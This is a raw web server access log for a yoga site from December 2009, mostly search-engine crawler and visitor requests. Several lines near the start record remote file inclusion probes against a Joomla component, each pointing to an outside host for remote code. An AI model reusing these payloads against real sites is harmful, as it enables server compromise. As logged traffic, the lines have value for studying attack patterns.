195.137.160.90 - - [08/Dec/2009:06:56:15 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.137.160.90 - - [08/Dec/2009:06:56:15 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.137.160.90 - - [08/Dec/2009:06:56:27 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.56.77.54 - - [08/Dec/2009:06:56:47 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
202.131.226.52 - - [08/Dec/2009:07:01:16 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://supra.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
202.131.226.52 - - [08/Dec/2009:07:01:16 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://supra.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
202.131.226.52 - - [08/Dec/2009:07:01:16 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://supra.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
67.195.111.237 - - [08/Dec/2009:10:16:46 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.237 - - [08/Dec/2009:10:16:47 -0800] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
77.88.29.247 - - [08/Dec/2009:12:05:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [08/Dec/2009:17:11:01 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
24.19.39.128 - - [08/Dec/2009:20:12:29 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.peaceyoga.com"
24.19.39.128 - - [08/Dec/2009:20:12:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:55 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:56 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:57 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:58 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:28:59 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:01 -0800] "GET /_private/ HTTP/1.1" 403 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:02 -0800] "GET /logs/ HTTP/1.1" 200 4090 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:03 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:04 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:05 -0800] "GET /?M=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
69.58.178.30 - - [08/Dec/2009:20:29:06 -0800] "GET /?S=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.peaceyoga.com"
74.54.223.100 - - [08/Dec/2009:21:40:14 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://gminamakow.info//dmdocuments/mambo??? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.peaceyoga.com"
74.54.223.100 - - [08/Dec/2009:21:40:14 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://gminamakow.info//dmdocuments/mambo??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.peaceyoga.com"
67.195.111.237 - - [08/Dec/2009:22:08:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.237 - - [08/Dec/2009:22:08:28 -0800] "GET /logs/access.log HTTP/1.0" 200 29574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.237 - - [08/Dec/2009:22:28:38 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
77.88.29.247 - - [08/Dec/2009:23:15:50 -0800] "GET /logs/ HTTP/1.1" 200 3947 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.111.39 - - [09/Dec/2009:01:32:24 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [09/Dec/2009:01:32:24 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:49:43 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:50:01 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:50:18 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:50:52 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:25 -0800] "GET /iphone/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:30 -0800] "GET /mobile/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:35 -0800] "GET /m/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:41 -0800] "GET /mobi/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:47 -0800] "GET /iphone/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:53 -0800] "GET /mobile/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:51:59 -0800] "GET /m/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:52:09 -0800] "GET /mobi/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.peaceyoga.com"
72.44.43.254 - - [09/Dec/2009:01:52:15 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "peaceyoga.com"
77.88.29.247 - - [09/Dec/2009:05:20:47 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:05:55:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:06:53:23 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
69.46.243.50 - - [09/Dec/2009:06:57:30 -0800] "GET /logs/access_081101.log HTTP/1.1" 200 4529 "http://www.google.com/search?q=http%3A%2F%2Fshopping.yahoo.com%2Fsearch%3B_ylc%3DX3oDMTIzOTVxaTRxBF9TAzc4NDcxNzI0MARfcwMxNDQ4OTExNQRwcnRucl9pZAMyMTE4MTE4BHNlYwNhZmZpbGlhdGUEc2xrA2xhbmRpbmc-%3Frd%3D&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
69.46.243.50 - - [09/Dec/2009:06:57:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
69.46.243.50 - - [09/Dec/2009:06:57:31 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:07:41:55 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
67.195.113.236 - - [09/Dec/2009:07:58:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.236 - - [09/Dec/2009:07:58:16 -0800] "GET /logs/?M=A HTTP/1.0" 200 3931 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.39 - - [09/Dec/2009:08:45:53 -0800] "GET /logs/ HTTP/1.0" 200 3931 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:09:40:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:11:00:04 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:12:05:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:12:32:19 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:13:26:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.207.70 - - [09/Dec/2009:13:44:42 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:04 -0800] "GET /logs/ HTTP/1.1" 200 3947 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:17 -0800] "GET /logs/access.log HTTP/1.1" 200 36575 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:17 -0800] "GET /logs/access_081002.log HTTP/1.1" 200 3570 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090301.log HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090329.log HTTP/1.1" 200 57439 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090330.log HTTP/1.1" 200 3322 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090331.log HTTP/1.1" 200 1128 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 929 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090501.log HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:19 -0800] "GET /logs/access_090531.log HTTP/1.1" 200 63535 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_090601.log HTTP/1.1" 200 1166 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_090701.log HTTP/1.1" 200 45555 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_090731.log HTTP/1.1" 200 64906 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_090801.log HTTP/1.1" 200 5021 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_090901.log HTTP/1.1" 200 42289 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:20 -0800] "GET /logs/access_091001.log HTTP/1.1" 200 54267 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:21 -0800] "GET /logs/access_091031.log HTTP/1.1" 200 52295 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [09/Dec/2009:14:42:21 -0800] "GET /logs/access_091201.log HTTP/1.1" 200 83387 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
67.195.111.39 - - [09/Dec/2009:20:11:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [09/Dec/2009:20:11:19 -0800] "GET /logs/access_070531.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
76.14.16.121 - - [09/Dec/2009:20:31:00 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15" "www.peaceyoga.com"
76.14.16.121 - - [09/Dec/2009:20:31:01 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15" "www.peaceyoga.com"
76.14.16.121 - - [09/Dec/2009:20:31:04 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15" "www.peaceyoga.com"
76.14.16.121 - - [09/Dec/2009:20:33:58 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15" "www.peaceyoga.com"
67.195.113.236 - - [09/Dec/2009:22:51:08 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.236 - - [09/Dec/2009:22:51:08 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
74.52.245.146 - - [10/Dec/2009:00:35:25 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.peaceyoga.com"
67.195.111.39 - - [10/Dec/2009:02:32:47 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [10/Dec/2009:02:32:48 -0800] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [10/Dec/2009:06:50:52 -0800] "GET /logs/access_080331.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
207.114.187.198 - - [10/Dec/2009:12:04:27 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
207.114.187.198 - - [10/Dec/2009:12:04:27 -0800] "GET / HTTP/1.0" 200 900 "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
77.88.29.247 - - [10/Dec/2009:14:22:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.111.39 - - [10/Dec/2009:19:23:58 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [10/Dec/2009:19:23:59 -0800] "GET /logs/?S=A HTTP/1.0" 200 3788 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
77.88.29.247 - - [10/Dec/2009:21:33:41 -0800] "GET /_private/ HTTP/1.1" 403 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.111.39 - - [11/Dec/2009:01:28:40 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [11/Dec/2009:01:28:40 -0800] "GET /logs/access_070401.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
77.88.29.247 - - [11/Dec/2009:02:30:05 -0800] "GET /logs/access.log HTTP/1.1" 200 43289 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.113.236 - - [11/Dec/2009:07:55:06 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.236 - - [11/Dec/2009:07:55:07 -0800] "GET /logs/?S=A HTTP/1.0" 200 3788 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.39 - - [11/Dec/2009:08:57:12 -0800] "GET /?M=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
77.88.51.23 - - [11/Dec/2009:15:31:45 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
77.88.29.247 - - [11/Dec/2009:21:08:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
116.71.184.165 - - [12/Dec/2009:12:55:16 -0800] "GET / HTTP/1.0" 200 900 "-" "PHPCrawl" "www.peaceyoga.com"
69.235.46.2 - - [12/Dec/2009:16:52:14 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "peaceyoga.com"
69.235.46.2 - - [12/Dec/2009:16:52:14 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "peaceyoga.com"
77.88.29.247 - - [12/Dec/2009:21:55:41 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:08:33:29 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
69.231.9.22 - - [13/Dec/2009:10:50:42 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "peaceyoga.com"
69.231.9.22 - - [13/Dec/2009:10:50:43 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "peaceyoga.com"
69.231.9.22 - - [13/Dec/2009:10:50:44 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)" "peaceyoga.com"
69.231.9.22 - - [13/Dec/2009:10:50:50 -0800] "GET /logs/ HTTP/1.1" 200 3804 "http://peaceyoga.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "peaceyoga.com"
69.231.9.22 - - [13/Dec/2009:10:50:52 -0800] "GET /logs/access_081031.log HTTP/1.1" 200 84619 "http://peaceyoga.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:17:33:45 -0800] "GET /logs/access_081101.log HTTP/1.1" 200 4529 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:18:27:44 -0800] "GET /logs/access_091101.log HTTP/1.1" 200 3641 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:19:29:43 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 929 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
